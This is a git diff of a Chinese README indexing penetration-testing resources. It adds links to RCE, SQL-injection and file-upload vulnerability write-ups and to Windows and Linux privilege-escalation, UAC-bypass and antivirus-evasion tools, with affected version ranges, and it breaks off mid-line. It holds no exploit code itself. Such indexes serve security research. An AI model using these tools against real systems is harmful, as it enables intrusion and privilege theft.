可视化利用工具,集成密钥爆破,命令回显内存马注入等功能](https://github.com/KpLi0rn/ShiroExploit) - [tongda_oa_rce-通达oa 越权登录+文件上传getshell](https://github.com/clm123321/tongda_oa_rce) - [CVE-2020-11651-SaltStack Proof of Concept【认证绕过RCE漏洞】](https://github.com/0xc0d/CVE-2020-11651)|[CVE-2020-11651&&CVE-2020-11652 EXP](https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP) -- [showdoc的api_page存在任意文件上传getshell](./showdoc的api_page存在任意文件上传getshell.md) +- [showdoc的api_page存在任意文件上传getshell](./web/showdoc的api_page存在任意文件上传getshell.md) - [Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法](https://github.com/CaijiOrz/fastjson-1.2.47-RCE) - [SpringBoot_Actuator_RCE](https://github.com/jas502n/SpringBoot_Actuator_RCE) - [jizhicms(极致CMS)v1.7.1代码审计-任意文件上传getshell+sql注入+反射XSS](./books/jizhicms(极致CMS)v1.7.1代码审计引发的思考.pdf) 
@@ -227,13 +236,13 @@ - [CVE-2020-14645-WebLogic 远程代码执行漏洞](https://github.com/Y4er/CVE-2020-14645)|[Weblogic_CVE-2020-14645](https://github.com/DSO-Lab/Weblogic_CVE-2020-14645) - [CVE-2020-6287-SAP NetWeaver AS JAVA 授权问题漏洞-创建用户EXP](https://github.com/duc-nt/CVE-2020-6287-exploit)|[SAP_RECON-PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)](https://github.com/chipik/SAP_RECON) - [CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019) -- [CVE-2020-3452:Cisco ASA/FTD 任意文件读取漏洞](./CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md) +- [CVE-2020-3452:Cisco ASA/FTD 任意文件读取漏洞](./web/CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md) - [74CMS_v5.0.1后台RCE分析](./books/74CMS_v5.0.1后台RCE分析.pdf) - [CVE-2020-8163 - Remote code execution of user-provided local names in Rails](https://github.com/sh286/CVE-2020-8163) -- [【0day RCE】Horde Groupware Webmail Edition RCE](./%E3%80%900day%20RCE%E3%80%91Horde%20Groupware%20Webmail%20Edition%20RCE.md) +- [【0day RCE】Horde Groupware Webmail Edition RCE](./web/【0day%20RCE】Horde%20Groupware%20Webmail%20Edition%20RCE.md) - [pulse-gosecure-rce-Tool to test for existence of CVE-2020-8218](https://github.com/withdk/pulse-gosecure-rce-poc) - [Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)](https://github.com/BishopFox/pwn-pulse) -- [Zblog默认Theme_csrf+储存xss+getshell](./Zblog默认Theme_csrf+储存xss+getshell.md) +- [Zblog默认Theme_csrf+储存xss+getshell](./web/Zblog默认Theme_csrf+储存xss+getshell.md) - [用友GRP-u8 注入+天融信TopApp-LB 负载均衡系统sql注入](https://mrxn.net/Infiltration/292.html)|[绿盟UTS综合威胁探针管理员任意登录复现](https://mrxn.net/Infiltration/276.html)|[HW弹药库之深信服EDR 3.2.21 任意代码执行漏洞分析](https://mrxn.net/jswz/267.html) - [CVE-2020-13935-Tomcat的WebSocket安全漏洞可导致拒绝服务攻击](https://github.com/RedTeamPentesting/CVE-2020-13935) - [Douphp 网站后台存储型XSS漏洞分析](./books/Douphp%20网站后台存储型XSS漏洞分析.pdf)-[原文地址](https://mp.weixin.qq.com/s/dmFoMJaUH_ULnhu_T9jSGA) 
@@ -243,7 +252,7 @@ - [cve-2019-17558-apache solr velocity 注入远程命令执行漏洞 ](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool) - [Weblogic Server(CVE-2021-2109 )远程代码执行漏洞](./books/Weblogic%20Server(CVE-2021-2109%20)远程代码执行漏洞复现.pdf)-[原文地址](https://mp.weixin.qq.com/s/kEi1s3Ki-h7jjdO7gyDsaw) - [辰光PHP客服系统源码3.6 前台 getshell-0day](./books/辰光PHP客服系统源码3.620%前台20%getshell-0day.pdf)|[原文地址](https://mp.weixin.qq.com/s/jWqhZYXuBQ2kfpvnWsfeXA) -- [zzzcms(asp)前台Getshell](./zzzcms(asp)前台Getshell.md) +- [zzzcms(asp)前台Getshell](./web/zzzcms(asp)前台Getshell.md) - [wjdhcms前台Getshell(条件竞争)](./books/wjdhcms前台Getshell(条件竞争).pdf)-[原文地址](https://www.t00ls.net/articles-59727.html) - [glpi_cve-2020-11060](https://github.com/zeromirror/cve_2020-11060)-[相关文章](https://xz.aliyun.com/t/9144) - [CVE-2021-21315-PoC-Node.js组件systeminformation代码注入漏洞](https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC) @@ -368,6 +377,7 @@ - [从 js map 泄露到接管 OSS 对象存储的一次经典案例分享](./books/从%20js%20map%20泄露到接管%20OSS%20对象存储的一次经典案例分享.html) - [浅析DolphinPHP新版本的漏洞挖掘](./books/浅析DolphinPHP新版本的漏洞挖掘.html) - [通用Tomcat InvokerServlet RCE攻击链挖掘](./books/通用Tomcat%20InvokerServlet%20RCE攻击链挖掘.html) +- [从 Tomcat JMX Proxy 到 RCE:AccessLogValve 注入利用](https://hackt.us/from-tomcat-jmx-proxy-to-rce-via-accesslogvalve-injection)|[jmx2rce:Tomcat JMX Proxy 未授权 AccessLogValve 注入利用工具(扫描/文件读取/RCE/清理一体化)](https://github.com/Hacktus/jmx2rce) - [金和OA C6办公系统全局绕过漏洞分析](./books/金和OA%20C6办公系统全局绕过漏洞分析.html) - [关于PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)简要说明](./books/关于PHP%20CGI%20Windows平台远程代码执行漏洞(CVE-2024-4577)简要说明.html) - [MSSQL注入绕过360执行命令](./books/MSSQL注入绕过360执行命令.html) 
@@ -762,27 +772,110 @@ - [东胜物流软件 MsAnnounceController SQL注入漏洞](https://mrxn.net/jswz/dongsheng-MsAnnounce-GetData-sqli.html) - [大蚂蚁 (BigAnt) 即时通讯系统 PublicController 任意文件读取漏洞](https://mrxn.net/jswz/bigant-Public-download.html) - [东胜物流软件 MsChDuiController 多个SQL注入漏洞](https://mrxn.net/jswz/dongsheng-MsChDuiController-sqli.html) +- [九佳易管理系统 picHY.ashx SQL 注入漏洞](https://mrxn.net/jswz/a8erp-HuiYuanDangAn-picHY-sqli.html) +- [大蚂蚁 (BigAnt) 即时通讯系统 安装程序二次注入致远程代码执行漏洞](https://mrxn.net/jswz/bigant-install-config-rce.html) +- [青龙面板最新版v2.20.1 鉴权绕过致RCE](https://mrxn.net/jswz/qinglong-auth-bypass-rce.html) | [青龙(qinglong)面板权限绕过致未授权远程代码执行(RCE)漏洞分析复现.md](./qinglong-auth-bypass2rce/青龙(qinglong)面板权限绕过致未授权远程代码执行(RCE)漏洞分析复现.md) +- [大蚂蚁 (BigAnt) 即时通讯系统 moveDept SQL注入漏洞](https://mrxn.net/jswz/bigant-dept-moveDept-sqli.html) +- [九佳易管理系统 Ajax_XT.ashx SQL 注入漏洞](https://mrxn.net/jswz/a8erp-Ajax_XT-sqli.html) +- [九佳易管理系统 PrivilegedCodeDestroy.asmx SQL注入漏洞](https://mrxn.net/jswz/a8erp-Interface-licx-PrivilegedCodeDestroy-sqli.html) +- [大蚂蚁 (BigAnt) 即时通讯系统 updateLoginName SQL注入漏洞](https://mrxn.net/jswz/bigant-user-updateLoginName-sqli.html) +- [深信服运维安全管理系统 change_net 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-netConfig-change_net-rce.html) +- [深信服运维安全管理系统 del_net 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-netConfig-del_net-rce.html) +- [深信服运维安全管理系统 del_route 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-netConfig-del_route-rce.html) +- [深信服运维安全管理系统 getLdap 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-getLdap-rce.html) +- [深信服运维安全管理系统 save_SNMP 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-SNMP-save_SNMP-rce.html) +- [深信服运维安全管理系统 csspost/update 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-csspost-update-rce.html) +- [深信服运维安全管理系统 upload_file 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-cssp-app-upload_file-rce.html) +- [深信服运维安全管理系统 del_patch 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-concentration_management-del_patch-rce.html) +- [深信服运维安全管理系统 install_patch 
远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-concentration_management-install_patch-rce.html) +- [深信服运维安全管理系统 remote_get_clip_img 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-subforeign-audit-remote_get_clip_img-rce.html) +- [深信服运维安全管理系统 uninstall_patch 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-concentration_management-uninstall_patch-rce.html) +- [深信服运维安全管理系统 get_clip_img 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-subforeign-audit-get_clip_img-rce.html) +- [深信服运维安全管理系统 down_load 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-subforeign-audit-down_load-rce.html) +- [深信服运维安全管理系统 port_validate 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-ip_and_port-port_validate-rce.html) +- [深信服运维安全管理系统 save_strategy 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-node_management-save_strategy-rce.html) +- [深信服运维安全管理系统 generate_certificate 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-outServices-generate_certificate-rce.html) +- [深信服运维安全管理系统 update_date 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-timeSet-update_date-rce.html) +- [深信服运维安全管理系统 upload_CN 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-version-upload_CN-rce.html) +- [深科特 LEAN MES系统 ChooseLineAndRes.ashx SQL 注入漏洞](https://mrxn.net/jswz/lean-mes-ChooseLineAndRes-sqli.html) +- [深科特 LEAN MES系统 /Handler/SMTLoadingMaterial.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-SMTLoadingMaterial-sqli.html) +- [深科特 LEAN MES系统 EquipmentTree.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-EquipmentTree-sqli.html) +- [深科特 LEAN MES系统 UploadPortraits.ashx 文件上传漏洞](https://mrxn.net/jswz/lean-mes-UploadPortraits-fileupload-rce.html) +- [深科特 LEAN MES系统 /Handler/FileSync.ashx 任意文件读取/上传/删除/SSRF等多个漏洞](https://mrxn.net/jswz/lean-mes-FileSync-fileupload-rce-ssrf-filerad.html) +- [深科特 LEAN MES系统 DownLoad.aspx 任意文件读取漏洞](https://mrxn.net/jswz/lean-mes-DownLoad-fileread.html) +- [深科特 LEAN MES系统 /Handler/MobileAppLogin.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-MobileAppLogin-sqli.html) +- [深科特 LEAN MES系统 PrintUpdate.ashx 
任意文件读取/上传/删除漏洞](https://mrxn.net/jswz/lean-mes-PrintUpdate-fileupload-rce-fileread.html) +- [深科特 LEAN MES系统 TestManagePlatform.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-TestManagePlatform-sqli.html) +- [深科特 LEAN MES系统 UploadHander.ashx 文件上传漏洞](https://mrxn.net/jswz/lean-mes-UploadHander-fileuplaod-rce.html) +- [深科特 LEAN MES系统 CreateMenus.aspx 任意文件上传漏洞](https://mrxn.net/jswz/lean-mes-CreateMenus-fileuplaod-rce.html) +- [深科特 LEAN MES系统 AutoComplete.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-AutoComplete-sqli.html) +- [深科特 LEAN MES系统 ChooseImage.aspx 任意文件上传/删除漏洞](https://mrxn.net/jswz/lean-mes-ChooseImage-fileupload-rce-filedel.html) +- [深科特 LEAN MES系统 SetDataSource.aspx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-SetDataSource-sqli.html) +- [CLIProxyAPI /v1internal:method 未授权访问漏洞](https://mrxn.net/news/CLIProxyAPI-v1internal-method-unauthorized-access.html) +- [shannon:面向 Web 应用与 API 的自主 AI 渗透测试工具,支持代码感知动态漏洞挖掘与自动化 PoC 验证](https://github.com/KeygraphHQ/shannon) +- [孚盟云CRM AjaxTrackInfo.ashx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-AjaxTrackInfo-sqli.html) +- [孚盟云CRM DingHandler.ashx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-DingHandler-sqli.html) +- [孚盟云CRM PriceList.ashx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-PriceList-sqli.html) +- [孚盟云CRM WorkFlowHandler.ashx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-WorkFlowHandler-sqli.html) +- [孚盟云CRM AddInquiry.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-AddInquiry-sqli.html) +- [孚盟云CRM OrderLook.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-OrderLook-sqli.html) +- [孚盟云CRM FormDefault.aspx、FormDefaultCommon.aspx 多处SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-FormDefault-sqli.html) +- [天地伟业Easy7 queryRoomName SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-queryRoomName-sqli.html) +- [天地伟业Easy7 queryRoomConfigs SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-queryRoomConfigs-sqli.html) +- [天地伟业Easy7 UploadOwnerImage.jsp 
文件上传漏洞](https://mrxn.net/jswz/easy7-apps-WebService-UploadOwnerImage-rce.html) +- [mdserver-web(夸父面板)≤0.18.4 多处未授权访问 + 信息泄露 + RCE 漏洞分析](https://mrxn.net/jswz/mdserver-web-unauthentication-bypass-rce.html) +- [天地伟业Easy7 GetOtherDomainServer.jsp SSRF漏洞](https://mrxn.net/jswz/easy7-apps-WebService-GetOtherDomainServer-SSRF.html) +- [天地伟业Easy7 getInquestIdByRoomId SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-getInquestIdByRoomId-sqli.html) +- [天地伟业Easy7 getInquestRoomChannelInfo SQL注入漏洞](https://mrxn.net/jswz/1422.html) +- [V2Board 信息泄露漏洞至权限绕过接管账户(CVE-2026-39912)分析复现](https://mrxn.net/jswz/v2board-data-leak-authentication-bypass.html) +- [天地伟业Easy7 isHashCameraAuth SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-isHashCameraAuth-sqli.html) +- [天地伟业Easy7 getConfigInfoList SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-getConfigInfoList-sqli.html) +- [天地伟业Easy7 capture 命令执行漏洞](https://mrxn.net/jswz/easy7-rest-file-capture-rce.html) +- [天地伟业Easy7 uploadLedImage 文件上传漏洞](https://mrxn.net/jswz/easy7-rest-file-uploadLedImage-rce.html) +- [天地伟业Easy7 /Easy7/rest/file/delete 文件删除漏洞](https://mrxn.net/jswz/easy7-rest-file-delete.html) +- [天地伟业Easy7 /Easy7/rest/file/downloadFile 文件读取漏洞](https://mrxn.net/jswz/easy7-rest-file-downloadFile.html) +- [天地伟业Easy7 /Easy7/rest/file/uploadIdsHttpFile SSRF+文件写入漏洞](https://mrxn.net/jswz/easy7-rest-file-uploadIdsHttpFile-rce.html) +- [孚盟云CRM CustomizeReportSelectMould.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-CustomizeReport-CustomizeReportSelectMould-sqli.html) +- [孚盟云CRM ClientNameCard.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Card-ClientNameCard-sqli.html) +- [孚盟云CRM BusinessPrice.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusinessPrice-sqli.html) +- [cPanel WHM 权限绕过致RCE【cve-2026-41940】](https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py) | [cve-2026-41940 
漏洞分析](https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/) +- [孚盟云CRM BusinessPriceListList.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusinessPriceList-sqli.html) +- [天地伟业Easy7 /Easy7/rest/file/uploadFile 文件上传漏洞](https://mrxn.net/jswz/easy7-rest-file-uploadFile-rce.html) +- [天地伟业Easy7 /Easy7/rest/file/deleteFile 文件删除漏洞](https://mrxn.net/jswz/easy7-rest-file-deleteFile.html) +- [天地伟业Easy7 /Easy7/rest/file/download 文件读取漏洞](https://mrxn.net/jswz/easy7-rest-file-download-fileread.html) +- [天地伟业Easy7 /Easy7/rest/user/getAuthorityByUserId SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-user-getAuthorityByUserId-sqli.html) +- [天地伟业Easy7 /Easy7/rest/user/IsPermissible SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-user-IsPermissible-sqli.html) +- [天地伟业Easy7 /Easy7/rest/user/getAuthorityByUserId SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-user-getAuthorityByUserId-sqli-2.html) +- [孚盟云CRM BusinessPriceOk.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusinessPriceOk-sqli.html) +- [孚盟云CRM BusinessPriceReport.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusinessPriceReport-sqli.html) +- [孚盟云CRM BusiPriceOkPrint.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusiPriceOkPrint-sqli.html) +- [用友 NC 系统 IMsgCenterWebService SQL注入漏洞](https://mrxn.net/jswz/yonyou-nc-IMsgCenterWebService-resetInvacationInfoByUsercode-sqli.html) +- [孚盟云CRM LoadMailAttachFile.aspx 任意文件读取/移动](https://mrxn.net/jswz/fumacrm-Common-LoadMailAttachFile-FileName-fileread.html) +- [孚盟云CRM Inquiry.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-Inquiry-sqli.html) +- [孚盟云CRM Price_detail.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-Price_detail-sqli.html) +- [孚盟云CRM ProductGrid.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-ProductGrid-sqli.html) +- [孚盟云CRM AjaxProductList.ashx 
SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Ajax-AjaxProductList-sqli.html) ## 提权辅助相关 -- [windows-kernel-exploits Windows平台提权漏洞集合](https://github.com/SecWiki/windows-kernel-exploits) +- [windows-kernel-exploits Windows平台提权漏洞集合(Windows XP - Windows 10/Server 2019)](https://github.com/SecWiki/windows-kernel-exploits) - [windows 溢出提权小记](https://klionsec.github.io/2017/04/22/win-0day-privilege/)/[本地保存了一份+Linux&Windows提取脑图](./tools/Local%20Privilege%20Escalation.md) - [Windows常见持久控制脑图](./tools/Windows常见持久控制.png) -- [CVE-2019-0803 Win32k漏洞提权工具](./CVE-2019-0803) -- [脏牛Linux提权漏洞](https://github.com/Brucetg/DirtyCow-EXP)-[reverse_dirty-更改的脏牛提权代码,可以往任意文件写入任意内容](https://github.com/Rvn0xsy/reverse_dirty)|[linux_dirty:更改后的脏牛提权代码,可以往任意文件写入任意内容,去除交互过程](https://github.com/Rvn0xsy/linux_dirty)|[dirtycow-mem:脏牛利用C源码](https://github.com/sqlnetcat/dirtycow-mem)-[文章](https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA)-[备份](https://archive.ph/wip/NCL3w)-[备份1](https://web.archive.org/web/20220918065539/https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA) +- [CVE-2019-0803 Win32k漏洞提权工具(Windows 7/8/10, Server 2008/2012/2016/2019)](./CVE-2019-0803) +- [脏牛Linux提权漏洞(CVE-2016-5195,Linux kernel 2.6.22 - 4.8.2)](https://github.com/Brucetg/DirtyCow-EXP)-[reverse_dirty-更改的脏牛提权代码,可以往任意文件写入任意内容](https://github.com/Rvn0xsy/reverse_dirty)|[linux_dirty:更改后的脏牛提权代码,可以往任意文件写入任意内容,去除交互过程](https://github.com/Rvn0xsy/linux_dirty)|[dirtycow-mem:脏牛利用C源码](https://github.com/sqlnetcat/dirtycow-mem)-[文章](https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA)-[备份](https://archive.ph/wip/NCL3w)-[备份1](https://web.archive.org/web/20220918065539/https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA)|[CVE-2016-5195:timwr实现的Android版Dirty Cow利用工具](https://github.com/timwr/CVE-2016-5195) - [远控免杀从入门到实践之白名单(113个)](https://github.com/TideSec/BypassAntiVirus)|[远控免杀从入门到实践之白名单(113个)总结篇.pdf](./books/远控免杀从入门到实践之白名单(113个)总结篇.pdf) -- [Linux提权-CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with 
PTRACE_TRACEME](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64) +- [Linux提权-CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME(Linux kernel < 5.1.17,aarch64架构)](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64) - [Linux权限提升辅助一键检测工具](https://github.com/mzet-/linux-exploit-suggester) - [将powershell脚本直接注入到进程中执行来绕过对powershell.exe的限制](https://github.com/EmpireProject/PSInject) - [CVE-2020-2696 – Local privilege escalation via CDE dtsession](https://github.com/0xdea/exploits/blob/master/solaris/raptor_dtsession_ipa.c) -- [CVE-2020-0683-利用Windows MSI “Installer service”提权](https://github.com/padovah4ck/CVE-2020-0683/) +- [CVE-2020-0683-利用Windows MSI “Installer service”提权(Windows 7/8.1/10, Server 2008/2012/2016/2019)](https://github.com/padovah4ck/CVE-2020-0683/) - [Linux sudo提权辅助工具—查找sudo权限配置漏洞](https://github.com/TH3xACE/SUDO_KILLER) -- [Windows提权-CVE-2020-0668:Windows Service Tracing本地提权漏洞](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668) +- [Windows提权-CVE-2020-0668:Windows Service Tracing本地提权漏洞(Windows 10 ≥ build 1903 使用UsoDllLoader;Windows < build 1903 使用diaghub)](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668) - [Linux提取-Linux kernel XFRM UAF poc (3.x - 5.x kernels)2020年1月前没打补丁可测试](https://github.com/duasynt/xfrm_poc) -- [linux-kernel-exploits Linux平台提权漏洞集合](https://github.com/SecWiki/linux-kernel-exploits) +- [linux-kernel-exploits Linux平台提权漏洞集合(覆盖 Linux 2.4 - 5.x 内核版本)](https://github.com/SecWiki/linux-kernel-exploits) - [Linux提权辅助检测Perl脚本](https://github.com/jondonas/linux-exploit-suggester-2)|[Linux提权辅助检测bash脚本](https://github.com/mzet-/linux-exploit-suggester)|[Unix-PrivEsc:本地 Unix 系统提权集合](https://github.com/FuzzySecurity/Unix-PrivEsc) -- [CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost](https://github.com/danigargu/CVE-2020-0796)|[【Windows提取】Windows SMBv3 LPE exploit 
已编译版.exe](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)|[SMBGhost_RCE_PoC-远程代码执行EXP](https://github.com/chompie1337/SMBGhost_RCE_PoC)|[Windows_SMBv3_RCE_CVE-2020-0796漏洞复现](./books/Windows_SMBv3_RCE_CVE-2020-0796漏洞复现.pdf)|[CVE-2020-0796](https://github.com/ran-sama/CVE-2020-0796) +- [CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost(Windows 10 version 1903/1909)](https://github.com/danigargu/CVE-2020-0796)|[【Windows提取】Windows SMBv3 LPE exploit 已编译版.exe](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)|[SMBGhost_RCE_PoC-远程代码执行EXP](https://github.com/chompie1337/SMBGhost_RCE_PoC)|[Windows_SMBv3_RCE_CVE-2020-0796漏洞复现](./books/Windows_SMBv3_RCE_CVE-2020-0796漏洞复现.pdf)|[CVE-2020-0796](https://github.com/ran-sama/CVE-2020-0796) - [getAV---windows杀软进程对比工具单文件版](./tools/getAV/) - [【Windows提权工具】Windows 7 to Windows 10 / Server 2019](https://github.com/CCob/SweetPotato)|[搭配Cobalt Strike的修改版可上线system权限的session](https://github.com/lengjibo/RedTeamTools/tree/master/windows/SweetPotato)|[RoguePotato:又一个 Windows 提权工具](https://github.com/antonioCoco/RoguePotato) - [【Windows提权工具】SweetPotato修改版,用于webshell下执行命令](https://github.com/uknowsec/SweetPotato)|[本地编译好的版本](./tools/SweetPotato.zip)|[点击下载或右键另存为](https://raw.githubusercontent.com/Mr-xn/Penetration_Testing_POC/master/tools/SweetPotato.zip)|[SweetPotato_webshell下执行命令版.pdf](./books/SweetPotato_webshell下执行命令版.pdf)|[JuicyPotato修改版-可用于webshell](https://github.com/uknowsec/JuicyPotato)|[JuicyPotatoNG:另一个 juicypotato](https://github.com/antonioCoco/JuicyPotatoNG)|[DCOMPotato: Some Service DCOM Object and SeImpersonatePrivilege abuse.](https://github.com/zcgonvh/DCOMPotato)|[GodPotato: 适用于Windows 2012 - Windows 2022的土豆提权工具](https://github.com/BeichenDream/GodPotato) 
@@ -791,53 +884,60 @@ - [【Windows提权 Windows 10&Server 2019】PrintSpoofer-Abusing Impersonation Privileges on Windows 10 and Server 2019](https://github.com/itm4n/PrintSpoofer)|[配合文章食用-pipePotato复现](./books/pipePotato复现.pdf)|[Windows 权限提升 BadPotato-已经在Windows 2012-2019 8-10 全补丁测试成功](https://github.com/BeichenDream/BadPotato) - [【Windows提权】Windows 下的提权大合集](https://github.com/lyshark/Windows-exploits) - [【Windows提权】-CVE-2020-1048 | PrintDemon本地提权漏洞-漏洞影响自1996年以来发布(Windows NT 4)的所有Windows版本](https://github.com/ionescu007/PrintDemon) -- [【Windows bypass UAC】UACME-一种集成了60多种Bypass UAC的方法](https://github.com/hfiref0x/UACME) +- [【Windows bypass UAC】UACME-一种集成了60多种Bypass UAC的方法(Windows 7 - Windows 11,各方法适用build范围不同)](https://github.com/hfiref0x/UACME) - [CVE-2020–1088: Windows wersvc.dll 任意文件删除本地提权漏洞分析](https://medium.com/csis-techblog/cve-2020-1088-yet-another-arbitrary-delete-eop-a00b97d8c3e2) -- [【Windows提权】CVE-2019-0863-Windows中错误报告机制导致的提权-EXP](https://github.com/sailay1996/WerTrigger) -- [【Windows提权】CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP) +- [【Windows提权】CVE-2019-0863-Windows中错误报告机制导致的提权-EXP(Windows 7/8.1/10, Server 2008/2012/2016/2019)](https://github.com/sailay1996/WerTrigger) +- [【Windows提权 Windows 7/Server 2008 R2】CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP) - [【Windows提权】CVE-2020-0787-EXP-ALL-WINDOWS-VERSION-适用于Windows所有版本的提权EXP](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION)|[CVE-2020-0787:提权带回显](https://github.com/yanghaoi/CVE-2020-0787)|[CVE-2020-0787_CNA:适用于Cobalt Strike的CVE-2020-0787提权文件](https://github.com/yanghaoi/CobaltStrike_CNA/tree/main/ReflectiveDllSource/CVE-2020-0787_CNA) -- [【Windows提权】CVE-2020-1054-Win32k提权漏洞Poc](https://github.com/0xeb-bp/cve-2020-1054)|[CVE-2020-1054-POC](https://github.com/Iamgublin/CVE-2020-1054) +- [【Windows提权 Windows 7/8.1/10, Server 
2008/2012/2016/2019】CVE-2020-1054-Win32k提权漏洞Poc](https://github.com/0xeb-bp/cve-2020-1054)|[CVE-2020-1054-POC](https://github.com/Iamgublin/CVE-2020-1054) - [【Linux提权】对Linux提权的简单总结](./books/对Linux提权的简单总结.pdf) -- [【Windows提权】wesng-Windows提权辅助脚本](https://github.com/bitsadmin/wesng)|[Windows-Exploit-Suggester:又一个 Windows 提权辅助Python脚本](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) -- [【Windows提权】dazzleUP是一款用来帮助渗透测试人员进行权限提升的工具,可以在window系统中查找脆弱面进行攻击。工具包括两部分检查内容,exploit检查和错误配置检查。](https://github.com/hlldz/dazzleUP) -- [【Windows提权】KernelHub-近二十年Windows权限提升集合](https://github.com/Ascotbe/KernelHub) +- [【Windows提权】wesng-Windows提权辅助脚本(Windows XP - Windows 11,支持所有Server版本)](https://github.com/bitsadmin/wesng)|[Windows-Exploit-Suggester:又一个 Windows 提权辅助Python脚本](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) +- [【Windows提权】dazzleUP是一款用来帮助渗透测试人员进行权限提升的工具,可以在window系统中查找脆弱面进行攻击。工具包括两部分检查内容,exploit检查和错误配置检查。(漏洞检查:Windows 10 build 1809/1903/1909/2004;配置检查:所有Windows版本)](https://github.com/hlldz/dazzleUP) +- [【Windows提权】KernelHub-近二十年Windows权限提升集合(Windows 2000 - 2023)](https://github.com/Ascotbe/KernelHub) - [【Windows提权】Priv2Admin-Windows提权工具](https://github.com/gtworek/Priv2Admin) -- [【windows提权】利用有漏洞的技嘉驱动程序来加载恶意的驱动程序提升权限或干掉驱动级保护的杀软](https://github.com/alxbrn/gdrv-loader)|[备份地址](https://github.com/Mr-xn/gdrv-loader) -- [【windows提权】byeintegrity-uac:通过劫持位于本机映像缓存中的DLL绕过UAC](https://github.com/AzAgarampur/byeintegrity-uac) -- [【Windows 提权】InstallerFileTakeOver:Windows Installer 本地提权漏洞PoC](https://github.com/klinix5/InstallerFileTakeOver) -- [【Linux 提权】CVE-2021-4034:Linux 